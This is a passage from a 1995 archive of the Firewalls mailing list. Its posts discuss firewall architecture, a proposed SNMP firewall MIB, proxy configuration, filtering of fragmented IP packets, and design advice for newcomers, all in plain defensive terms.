<199505071614.MAA19029@metis.milkyway.com> To: hcb@clark.NET Subject: Re: Source Code Newsgroups: milkyway.mail.firewalls In-Reply-To: <199505061711.NAA00687@clark.net> References: <199505041530.IAA29745@lykos.netpart.com> Organization: Milkyway Networks Corporation Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <199505061711.NAA00687@clark.net> you write: >Your point reminded me of an idea with which I have been playing: >managing firewalls using SNMP and a to-be-developed Firewall MIB. We'd very much like to get a committee going to discuss such a MIB. At the very least, SNMP alerts from the firewall would be very useful. >Before the flamethrowers go on, let's assume that we are using >an acceptably authenticated path for the SNMP flow. Whether this is >SNMPv2, link encryption, etc., is irrelevant for the immediate discussion. Yes. >What I'd like the list to consider are what are the abstract mechanisms >that reside on firewalls (including bastion hosts, screening routers, >etc.). These abstractions are what a MIB would describe. We would Would it be more appropriate to create a new list? Is there someone that is familiar with the political formalities of creating MIBs, coordinating with IETF, etc..? >Complain all you like about software; there's nothing like a >beta test on your body! :-) The question is, Marcus, did S/HE use formal methods to design us? :-) -- :!mcr!: | Milkyway Networks Corporation Michael Richardson | Makers of the Black Hole firewall NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com Home: mcr@sandelman.ocunix.on.ca. PGP key available. From firewalls-owner Sun May 7 09:33:08 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA15758 for firewalls-outgoing; Sun, 7 May 1995 08:57:30 -0700 Received: from blackhole.milkyway.com (milkyway.com [198.53.167.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA15746 for ; Sun, 7 May 1995 08:57:23 -0700 Received: from localhost (uucp@localhost) by blackhole.milkyway.com (8.6.5/8.6.6) id MAA18604 for ; Sun, 7 May 1995 12:06:33 -0400 Received: from jupiter.milkyway.com(192.168.77.9) by internet.milkyway.com via smap (V1.3) id sma018598; Sun May 7 12:06:23 1995 Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.7/8.6.6) with ESMTP id MAA26958; Sun, 7 May 1995 12:01:33 -0400 From: Michael Richardson Received: by metis.milkyway.com (8.6.9/BSDI-Client) id MAA18994; Sun, 7 May 1995 12:08:27 -0400 Date: Sun, 7 May 1995 12:08:27 -0400 Message-Id: <199505071608.MAA18994@metis.milkyway.com> To: maillet@doc.USmcs.maine.EDU Subject: Re: What if I don't have a proxy for my application? Newsgroups: milkyway.mail.firewalls In-Reply-To: <9505061519.AA07745@doc.usmcs.maine.edu> Organization: Milkyway Networks Corporation Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <9505061519.AA07745@doc.usmcs.maine.edu> you write: >Hey All, > How do application level firewalls (e.g. BlackHole) handle applications >that don't have a proxy program written for them? We use a "circuit layer" proxy, to use Bellovin and Cheswick's terminology. That is, a proxy that doesn't talk telnet or ftp, just moves the bytes. You can configure the circuit layer proxy to listen on all 64k ports, and can have it permit traffic from an IP address only after the user has "preauthorized" the connection. This is typical configuration, but not the only one: user sits down in the morning at workstation, uses telnet, ftp, gopher or http (in 2.0) to enable transparent mode using a password of some type. At which point they can use whatever service they want (finger, whois, doom, etc..) The admin can still put denys on specific ports (e.g. no doom during the day), and can selectively enable transparent mode. (It would be inappropriate for any external address!) [since I designed the rules for 2.0, I get to share my space with our technical writer while he does the final draft next week...] >database. If we (me.com) want to use an application firewall can we still >use the datascan app even if the firewall has no datascan proxy? And Yes. >make things more interesting the internal PC is using RFC 1597 IP >addresses. It is still a proxy system, not a packet filter, so if you are configured with private internal IP addresses (what we call Black Hole), then the access will appear to come from the firewall's external address, not the private addresses. If you have a WhiteHole configuration, then the accesses appear to come from the internal addresses. A WhiteHole is probably required to support Kerberos. We also support using some address that you pick on outgoing connections. >----- Ed Maillet >maillet@usmcs.maine.edu -- :!mcr!: | Milkyway Networks Corporation Michael Richardson | Makers of the Black Hole firewall NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com Home: mcr@sandelman.ocunix.on.ca. PGP key available. From firewalls-owner Sun May 7 11:12:13 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA17417 for firewalls-outgoing; Sun, 7 May 1995 11:04:34 -0700 Received: from [198.102.244.36] (quadra.greatcircle.com [198.102.244.36]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA17406; Sun, 7 May 1995 11:04:29 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 7 May 1995 11:05:12 -0800 To: Darren Reed , firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: IP packet filtering... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:23 AM 5/8/95, Darren Reed wrote: >I'd like to suggest that anyone who filters by port or the "established" >bit in their firewall add a rule which works *before* anything which might >match that description to drop _all_ fragmented IP packets. They can pose >a very large problem and rather than speculate about whether your vendor's >filtering does it "right" or can handle it at all, it is better to just >make yourself immune. > >I can't see anything in the FAQ about this and it has been quite a while >since I have seen anyone ask about this. Wait a sec... What's the problem with fragmented packets? Most filtering systems apply filtering only to the first fragment, and simply let all non-first fragments through. The assumption is that, if the filtering system decides to drop the first fragment, it doesn't matter if the rest get through, because the destination system won't be able to reassemble the packet without the first fragment. It doesn't depend on the destination's implementation; if the destination never sees the first fragment, it simply _can't_ reassemble the packet, because it doesn't have all the data. -Brent ---------------------------------------------------------------------- For info about the Internet Security Firewalls Tutorial and a schedule of upcoming dates, please send email to Tutorial-Info@GreatCircle.COM ---------------------------------------------------------------------- Brent Chapman Great Circle Associates Brent@GreatCircle.COM 1057 West Dana Street +1 415 962 0841 Mountain View, CA 94041 From firewalls-owner Sun May 7 14:39:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA19967 for firewalls-outgoing; Sun, 7 May 1995 14:21:12 -0700 Received: from biko.llc.org (biko.llc.org [199.45.69.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA19962 for ; Sun, 7 May 1995 14:21:05 -0700 Received: from [199.45.69.31] (pm-01.llc.org [199.45.69.31]) by biko.llc.org (8.6.12/LLC) with SMTP id RAA15563 for ; Sun, 7 May 1995 17:18:30 -0400 X-Sender: nit@llc.org (Unverified) Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 7 May 1995 17:21:03 -0400 To: firewalls@GreatCircle.COM From: nit@LLC.org (Martin Durand) Subject: fw newbie needs validation Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are about to get connected and the IS guys are nervous about their data so they insist on a firewall. My budget is almost nil so we'll probably go with TIS's fwtk running over FreeBSD 2.0. If I understood what I gathered here and in Cheswick & Bellovin, our setup would look like this: +-------------+ +---------+ | | Inside nets,|---| Cisco |----| +----------+ | servers... | | 2504 | |---| Cisco |----- Internet +-------------+ | Eth-Eth | | | 1003 | +---------+ | | Eth-ISDN | | +----------+ +---------+ | |Firewall/|----| |Bastion | | |(fwtk) | | +---------+ With static routes between the 1003<->firewall and 2504<->firewall. Anything heretic/dumb/screwed/laughable... about this ? __________________________. Martin Durand | I know I should be working on my .sig file, nit@llc.org | but who reads these things... From firewalls-owner Sun May 7 15:39:10 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA20722 for firewalls-outgoing; Sun, 7 May 1995 15:25:52 -0700 Received: from noc1.mid.net (noc1.mid.net [198.247.250.15]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA20712 for ; Sun, 7 May 1995 15:25:44 -0700 Received: from jayhawk.mid.net (jayhawk.mid.net [198.247.250.21]) by noc1.mid.net (8.6.10/8.6.9) with ESMTP id RAA16006; Sun, 7 May 1995 17:26:06 -0500 Received: (from alan@localhost) by jayhawk.mid.net (8.6.10/8.6.9) id RAA18708; Sun, 7 May 1995 17:26:23 -0500 From: Alan Hannan Message-Id: <199505072226.RAA18708@jayhawk.mid.net> Subject: Re: help with begining options? To: claudio@fly.CNUCE.CNR.IT (Claudio Telmon) Date: Sun, 7 May 1995 17:26:22 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Claudio Telmon" at May 5, 95 06:49:00 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2119 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Alan Hannan writes: > > > > The firewall should allow any outgoing traffic, but restrict incoming > > > > traffic to ONLY SMTP to one machine inside the net. All other servers > > > > (FTP, WWW, Etc. are in the unprotected network.) > > > > > > Of course you realize that by this method you make your entire internal > > > subnet only as strong as that SMTP server. Just an observation. > > > > And a wrong observation. While I would suggest using smap or sendmail > > on a machine on a DMZ network, if the only incoming traffic is > > restricted to SMTP, what is the attacker going to do that they > > couldn't do with any other type of firewall setup. Mail will be > > passed in any design. I'm not sure I made my point. Let us assume that a person can gain control of a firewall host by sendmail. It then follows that if they have control of the firewall, they (most likely) will have an easier time of exploiting the internal network. True, having root privs on a firewall doesn't give a person control of the internal network and internal hosts. However, it is rather difficult (in an intelligently designed fw system) for a person to control internal hosts without controlling the fw. > The problem with the last sendmail bug wasn't the incoming SMTP connection, it > was the outgoing ident connection. Correct me if I'm wrong, but by allowing any > outgoing connection, the bug could be exploited. True. Sendmail Client ------ Sendmail Server ( ~= firewall in this case ) Client sends message to Server. Server sents ident query to Sendmail Client. Sendmail Client would have a bogus ident server that overflows Sendmail Server's buffer and does that wacky hacking stuff. Hence the security hole. So, now all the Paranoid Corporations will only allow outgoing mail... ;) -- alan@mid.net, (402) 472-0241 (voice) Networked Systems Administrator (402) 472-0240 (fax) MIDnet, the United States Oldest Regional Internet Service Provider " They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety. " - Benjamin Franklin From firewalls-owner Sun May 7 20:09:13 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA23411 for firewalls-outgoing; Sun, 7 May 1995 19:55:43 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA23401; Sun, 7 May 1995 19:55:37 -0700 Message-Id: <199505080255.TAA23401@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA215851864; Mon, 8 May 1995 12:57:45 +1000 From: Darren Reed Subject: Re: IP packet filtering... To: Brent@GreatCircle.COM (Brent Chapman) Date: Mon, 8 May 1995 12:57:44 +1000 (EST) Cc: avalon@coombs.anu.edu.au, firewalls@greatcircle.com In-Reply-To: from "Brent Chapman" at May 7, 95 11:05:12 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1898 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Brent Chapman, they said: > > At 12:23 AM 5/8/95, Darren Reed wrote: > >I'd like to suggest that anyone who filters by port or the "established" > >bit in their firewall add a rule which works *before* anything which might > >match that description to drop _all_ fragmented IP packets. They can pose > >a very large problem and rather than speculate about whether your vendor's > >filtering does it "right" or can handle it at all, it is better to just > >make yourself immune. > > > >I can't see anything in the FAQ about this and it has been quite a while > >since I have seen anyone ask about this. > > Wait a sec... What's the problem with fragmented packets? Most filtering > systems apply filtering only to the first fragment, and simply let all > non-first fragments through. The assumption is that, if the filtering > system decides to drop the first fragment, it doesn't matter if the rest > get through, because the destination system won't be able to reassemble the > packet without the first fragment. It doesn't depend on the destination's > implementation; if the destination never sees the first fragment, it simply > _can't_ reassemble the packet, because it doesn't have all the data. Somewhat luckily for filtering, in TCP and UDP packets the port numbers are almost assured of being in the first fragment. The "established" bit can be in the 2nd or 3rd. And you *CAN* make a TCP connection with an MTU of 28, successfully - I've done it. I'm not 100% convinced yet that you need a first packet of at least that size. Why drop all fragments ? It reduces what some people are calling denial of service attack where you send lots of fragments towards a destination host and make it use all its network buffers for holding fragments which it is never going to use. Also, if I can fragment the first enough so that it gets through, then what ? darren From firewalls-owner Sun May 7 21:39:10 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA24636 for firewalls-outgoing; Sun, 7 May 1995 21:37:52 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA24631 for ; Sun, 7 May 1995 21:37:48 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s8KaH-0001D0C; Sun, 7 May 95 21:38 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA20073; Sun, 7 May 1995 21:37:44 +0800 Date: Sun, 7 May 1995 21:37:44 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505080437.AA20073@brittany.oes.amdahl.com> To: Firewalls@GreatCircle.COM, bwern@jax.jaxnet.com Subject: Re: Help with begining options? Content-Length: 3554 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Hello. Hello Ben. > >This may not specifically be in the charter, but I'm asking anyways. I'm >trying to learn as much as possible about firewalls, etc. For my upcoming Good! Nothing improves security like an education. >pitch for an internet connection for my company. If you guys/gals have a >free second, I'd love it if you could look at what I am proposing, poke >holes in it, and tell me where to go for more information. If not, just >delete, but I'd appriciate it if you have the time. I'll have a go at it. >My current design consists of a router to connect to the 56k or ISDN link. >The router dumps into a unsecure subnet that consists of whatever >sacraficial lamb machines I have serving the outside word, and the Firewall. Here's a danger. You sometimes hear people talk about sacrificial lamb machines, (anyone know the reference for the first occurance?) It's a real danger to think this way. These machines are the closest machines on the internet to your "secure" machines. That means that their security profile should be as high as your firewall. If they aren't EXTREMELY secure, you're letting all sorts of riff-raff set up shop on your doorstep. The least consequence of this is that you'll be embarrassed when a security officer at another shop calls you up and wants to know why an attack is originating from one of your machines, or a court order is served seizing one or more of your machines because they harbor stolen software, (warez d00d!) How about finding out that someone is snooping all the passwords of all the users logging into machines on your site from outside, or vice-versa? Please be careful:) In any case, if you provide a writable directory on an ftp site, such as /pub/incoming, then make sure that you monitor it frequently. You'll find that they create directories that include backspaces in the name to "erase" the name when listed so that even an ls -a doesn't show them. (Of course the space is still left in the listing for it.) >The firewall connects to our internal network. The firewall should allow any >outgoing traffic, but restrict incoming traffic to ONLY SMTP to one machine >inside the net. All other servers (FTP, WWW, Etc. are in the unprotected >network.) This is a good design. Another choice, (and one worth investigating even in your scheme,) is to have a simpler smtp daemon take the initial connection, and then queue it via sendmail or smail. It still leaves you open to any holes based on addresses, but cuts out categories of holes that require a direct connection to the daemon. ( Of course we're sure that they're all found and fixed by now, eh? ;) >My question lies in the Firewall server. I've been looking into Janus (or >BorderWare, or whatever they're calling it now), but that seems to force us >into using they're application servers, and might limit us as far as options >go. I've also been looking into Gauntlet, from TIS, and just using the FWTK >kit. Unfortunatly, I'm not expecting much money for this, so I expect I'll >be forced to scrimp. :( If you're forced to scrimp you could do worse than to use the FireWall ToolKit. It can be a bit frustrating for the users to have to stage through proxies, that require two stage connections, but you're in the ideal position, with users not yet used to a direct connection. If you use something that uses modified clients, such as socks, it's a lot nicer for your users though. > >Anyone care to offer thoughts, etc. for a new firewalls person? > >Thanks, You're welcome. Patrick > >Ben Wern _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Sun May 7 22:09:15 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA24912 for firewalls-outgoing; Sun, 7 May 1995 21:55:50 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA24905 for ; Sun, 7 May 1995 21:55:46 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s8Krf-0000TLC; Sun, 7 May 95 21:56 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA20086; Sun, 7 May 1995 21:55:59 +0800 Date: Sun, 7 May 1995 21:55:59 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505080455.AA20086@brittany.oes.amdahl.com> To: hcb@clark.net, patrick@oes.amdahl.com Subject: Re: SNMP and firewalls (was Re: Source Code) Cc: firewalls@greatcircle.com Content-Length: 354 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Patrick Horgan observed, >> >> Firewall-1 already uses SNMP for control. > > >My question is whether a vendor-independent firewall MIB >would be practical and useful. > >Howard > I quite think it would, and would not only support it, but like to work with a group to create it. It could only aid our industry to work toward standardisation. Patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Sun May 7 23:09:14 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA25632 for firewalls-outgoing; Sun, 7 May 1995 23:02:19 -0700 Received: from ingress.com (ingress.com [199.171.57.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id XAA25623 for ; Sun, 7 May 1995 23:02:15 -0700 Received: by ingress.com (4.1/SMI-4.1) id AA28566; Mon, 8 May 95 02:01:01 EDT Date: Mon, 8 May 1995 02:01:01 -0400 (EDT) From: Charles Kaplan To: firewalls@greatcircle.com Subject: ? about BBN's firewall Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As I recall BBN's smartwatch? is based on TIS 2.x code. Was it customised by BBN to be transparent (yes I know TIS 3.x is now transparent) ? Is smartwatch transparent ? What proxies are offered ? -Charles Networking / Internetworking / Security / Object Technology NT / UNIX / Novell From firewalls-owner Sun May 7 23:21:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA25591 for firewalls-outgoing; Sun, 7 May 1995 22:53:40 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA25586 for ; Sun, 7 May 1995 22:53:38 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s8Lle-0001EeC; Sun, 7 May 95 22:54 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA20128; Sun, 7 May 1995 22:53:35 +0800 Date: Sun, 7 May 1995 22:53:35 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505080553.AA20128@brittany.oes.amdahl.com> To: avalon@coombs.anu.edu.au, firewalls@greatcircle.com Subject: Re: IP packet filtering... Content-Length: 425 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I'd like to suggest that anyone who filters by port or the "established" >bit in their firewall add a rule which works *before* anything which might >match that description to drop _all_ fragmented IP packets. They can pose >a very large problem and rather than speculate about whether your vendor's >filtering does it "right" or can handle it at all, it is better to just >make yourself immune. It's unworkable. Patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Mon May 8 00:09:15 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA26505 for firewalls-outgoing; Sun, 7 May 1995 23:56:52 -0700 Received: from [198.102.244.36] (quadra.greatcircle.com [198.102.244.36]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id XAA26500; Sun, 7 May 1995 23:56:47 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 7 May 1995 23:57:32 -0800 To: Darren Reed From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: IP packet filtering... Cc: avalon@coombs.anu.edu.au, firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:57 PM 5/8/95, Darren Reed wrote: >In some mail from Brent Chapman, they said: >> >> Wait a sec... What's the problem with fragmented packets? Most filtering >> systems apply filtering only to the first fragment, and simply let all >> non-first fragments through. The assumption is that, if the filtering >> system decides to drop the first fragment, it doesn't matter if the rest >> get through, because the destination system won't be able to reassemble the >> packet without the first fragment. It doesn't depend on the destination's >> implementation; if the destination never sees the first fragment, it simply >> _can't_ reassemble the packet, because it doesn't have all the data. > >Somewhat luckily for filtering, in TCP and UDP packets the port numbers >are almost assured of being in the first fragment. The "established" >bit can be in the 2nd or 3rd. And you *CAN* make a TCP connection with an >MTU of 28, successfully - I've done it. I'm not 100% convinced yet that >you need a first packet of at least that size. I would suggest that a filtering rule that included examination of the ACK bit should NOT match a fragment where it can't see the ACK bit; that seems the safe thing to do. Now, whether various vendors do that or not, I don't know; do any of the representatives of the various filtering products here want to comment on how their products handle this case? >Why drop all fragments ? It reduces what some people are calling denial >of service attack where you send lots of fragments towards a destination >host and make it use all its network buffers for holding fragments which >it is never going to use. There are a _lot_ of ways (a seemingly infinite number of ways) to carry out denial of service attacks, starting with simply flooding those ports that you _do_ allow connections to. Why single out this one for special treatment? In my opinion, denial of service is one of the few cases where it's more appropriate to _respond_ to an attack than to _prevent_ it in the first place, because I don't really see any way to "prevent" them (there are so many of them) short of disconnecting from the network altogether. >Also, if I can fragment the first enough so >that it gets through, then what ? Yes, then what... However, as I mentioned above, you shouldn't be able to get the first fragment through. If a rule wants to look at the ACK bit, and the first fragment is so short it doesn't include the ACK bit, the filtering system shouldn't apply that rule to it. I would consider any filtering system that lets such packets through on the basis of such a rule to be simply broken; it should be fixed. -Brent ---------------------------------------------------------------------- For info about the Internet Security Firewalls Tutorial and a schedule of upcoming dates, please send email to Tutorial-Info@GreatCircle.COM ---------------------------------------------------------------------- Brent Chapman Great Circle Associates Brent@GreatCircle.COM 1057 West Dana Street +1 415 962 0841 Mountain View, CA 94041 From firewalls-owner Mon May 8 03:39:21 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA29647 for firewalls-outgoing; Mon, 8 May 1995 03:26:50 -0700 Received: from icnucevx.cnuce.cnr.it (icnucevx.cnuce.cnr.it [131.114.1.30]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA29642 for ; Mon, 8 May 1995 03:26:47 -0700 Received: from fly.cnuce.cnr.IT by mailsrv.cnuce.cnr.it (PMDF V4.3-13 #6635) id <01HQ9DU89L2OI02VXF@mailsrv.cnuce.cnr.it>; Mon, 08 May 1995 12:26:50 +0100 (MET) Received: by fly.cnuce.cnr.IT (Smail3.1.26.7 #1) id m0s8Q1z-00024qC; Mon, 8 May 95 12:27 MET Date: Mon, 08 May 1995 12:27 +0100 (MET) From: claudio@fly.CNUCE.CNR.IT (Claudio Telmon) Subject: Re: help with begining options To: firewalls@greatcircle.com Message-id: Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Alan Hannan writes: >Sendmail Client would have a bogus ident server that overflows Sendmail Server's >buffer and does that wacky hacking stuff. Hence the security hole. So, now >all the Paranoid Corporations will only allow outgoing mail... ;) My point was that the statement "Allow any outgoing traffic" is a dangerous one. Default should be "Deny any taffic" and then add only what you need, even for outgoing connections. This way, adding a SMTP connection won't give you a bonus (and dangerous) ident connection. The sendmail bug is just a nice example, since allowing only incoming SMTP seems to be a safe decision... BTW, I feel more comfortable with smap/smapd :) - Claudio From firewalls-owner Mon May 8 06:10:50 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA01117 for firewalls-outgoing; Mon, 8 May 1995 06:03:11 -0700 Received: from mail.DOAS.State.GA.US ([198.176.174.176]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA01112 for ; Mon, 8 May 1995 06:03:08 -0700 From: tyork@doas.state.ga.us Received: from tyorkh.DOAS.State.GA.US by mail.DOAS.State.GA.US (AIX 3.2/UCB 5.64/4.03) id AA15787; Mon, 8 May 1995 09:06:41 -0400 Date: Mon, 8 May 1995 09:06:41 -0400 Message-Id: <9505081306.AA15787@mail.DOAS.State.GA.US> X-Sender: tyork@mail.doas.state.ga.us X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com Subject: protecting dial-in/dial-out Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am trying to find some info on how modem access to a DEC Alpha attached to our network can be protected from unauthorized use. Is there a firewall or something like that? The machine is used for direct data tranfers to our districs and is called by the distric machines to update databases on the Alpha. TIA -TY *************************************************************************** --> My chicken peck'en is mine and mine alone - Not my employers! --> Tracy York tyork@doas.state.ga.us --> State of Georgia - DOAS/MIS/CSS --> 200 Piedmont Ave. SE, Ste 1620W --> Atlanta, GA. 30334-9010 Off Ph (404)657-4928 *************************************************************************** From firewalls-owner Mon May 8 06:42:36 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA01302 for firewalls-outgoing; Mon, 8 May 1995 06:36:39 -0700 Received: from noc1.mid.net (noc1.mid.net [198.247.250.15]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA01297 for ; Mon, 8 May 1995 06:36:36 -0700 Received: from jayhawk.mid.net (jayhawk.mid.net [198.247.250.21]) by noc1.mid.net (8.6.10/8.6.9) with ESMTP id IAA25483; Mon, 8 May 1995 08:37:01 -0500 Received: (from alan@localhost) by jayhawk.mid.net (8.6.10/8.6.9) id IAA15115; Mon, 8 May 1995 08:37:19 -0500 From: Alan Hannan Message-Id: <199505081337.IAA15115@jayhawk.mid.net> Subject: Re: SNMP and firewalls (was Re: Source Code) To: patrick@oes.amdahl.com (Patrick Horgan) Date: Mon, 8 May 1995 08:37:18 -0500 (CDT) Cc: hcb@clark.net, patrick@oes.amdahl.com, firewalls@GreatCircle.COM In-Reply-To: <9505080455.AA20086@brittany.oes.amdahl.com> from "Patrick Horgan" at May 7, 95 09:55:59 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 880 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >Patrick Horgan observed, > >> > >> Firewall-1 already uses SNMP for control. > > > > > >My question is whether a vendor-independent firewall MIB > >would be practical and useful. > > > >Howard > > > > I quite think it would, and would not only support it, but like to work > with a group to create it. It could only aid our industry to work toward > standardisation. I agree, a standardized snmp control/reporting mechanism for firewalls would be great. I will setup a mailing list if there is any interest. Please let me know if you would use such a list. -- alan@mid.net, (402) 472-0241 (voice) Networked Systems Administrator (402) 472-0240 (fax) MIDnet, the United States Oldest Regional Internet Service Provider " They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety. " - Benjamin Franklin From firewalls-owner Mon May 8 07:09:36 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA01409 for firewalls-outgoing; Mon, 8 May 1995 06:52:13 -0700 Received: from biko.llc.org (biko.llc.org [199.45.69.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA01404 for ; Mon, 8 May 1995 06:52:05 -0700 Received: (from nit@localhost) by biko.llc.org (8.6.12/LLC) id JAA27112 for firewalls@greatcircle.com; Mon, 8 May 1995 09:49:34 -0400 From: Martin Durand Message-Id: <199505081349.JAA27112@biko.llc.org> Subject: Re: fw newbie needs validat To: firewalls@greatcircle.com Date: Mon, 8 May 1995 09:49:33 -0400 (EDT) In-Reply-To: <00614.2882788084.3933@ecofin.uucp> from "John B*hrer" at May 8, 95 02:09:49 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 685 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > What means "NIL budget" in this context, that you can't afford $50'000 for > FireWall-1 ? > Why don't you spend some more and get the commercial BSDI Unix instead of > FreeBie-SD ? My total budget (machine, hds, routers, ISDN link installation...) is 15000 $ canadian or roughly 10000 $ US and that's including all taxes, duties and such. My server will probably be a HP Netserver LC with Pentium 60, 32 Mb RAM and 3 Gb of disk space. No screen or keyboard 'cause they're switched. Forget SCO or Unixware because of $$$ but BSDI might be interesting. Any ideas of the price or e-mail address so I can try to plea with them ? ______________. Martin Durand | nit@llc.org | From firewalls-owner Mon May 8 08:10:03 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA01572 for firewalls-outgoing; Mon, 8 May 1995 07:04:18 -0700 Received: from noc1.mid.net (noc1.mid.net [198.247.250.15]) by miles.greatcircle.com 